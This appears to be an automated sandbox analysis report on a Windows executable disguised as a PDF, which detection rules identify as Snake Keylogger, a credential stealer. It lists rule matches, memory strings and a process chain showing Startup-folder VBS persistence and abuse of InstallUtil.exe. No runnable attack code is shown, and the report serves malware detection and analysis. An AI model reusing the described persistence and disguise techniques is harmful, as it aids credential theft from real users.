                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F808E06_2_05F808E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F874A86_2_05F874A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F804986_2_05F80498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F874976_2_05F87497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F804886_2_05F80488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8B08F6_2_05F8B08F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F870506_2_05F87050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F800406_2_05F80040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F870406_2_05F87040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F844306_2_05F84430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F828186_2_05F82818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8D0186_2_05F8D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F800066_2_05F80006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F828076_2_05F82807
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8A3F86_2_05F8A3F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F86BD06_2_05F86BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F86BC16_2_05F86BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F833B86_2_05F833B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F833A86_2_05F833A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F867786_2_05F86778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8C3786_2_05F8C378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8676B6_2_05F8676B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F837306_2_05F83730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F863206_2_05F86320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F863116_2_05F86311
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8B6D96_2_05F8B6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F85EC86_2_05F85EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F85EB86_2_05F85EB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F85A706_2_05F85A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F85A606_2_05F85A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8D6616_2_05F8D661
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F8AA486_2_05F8AA48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F856186_2_05F85618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F856096_2_05F85609
                Source: File07098.PDF.exe, 00000000.00000000.2018722011.00000000000A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGilcdbotfkc.dll" vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2092659127.0000000005C8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2094031243.0000000005D00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGilcdbotfkc.dll" vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.000000000241D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGilcdbotfkc.dll" vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2077497584.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs File07098.PDF.exe
                Source: File07098.PDF.exeBinary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: File07098.PDF.exe, ResolverExporterExporter.csCryptographic APIs: 'CreateDecryptor'
                Source: Current.exe.0.dr, ResolverExporterExporter.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                Source: C:\Users\user\Desktop\File07098.PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs"
                Source: File07098.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: File07098.PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4489273646.0000000003D9A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026F6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: File07098.PDF.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\File07098.PDF.exeFile read: C:\Users\user\Desktop\File07098.PDF.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\File07098.PDF.exe "C:\Users\user\Desktop\File07098.PDF.exe"
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Current.exe "C:\Users\user\AppData\Roaming\Current.exe"
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
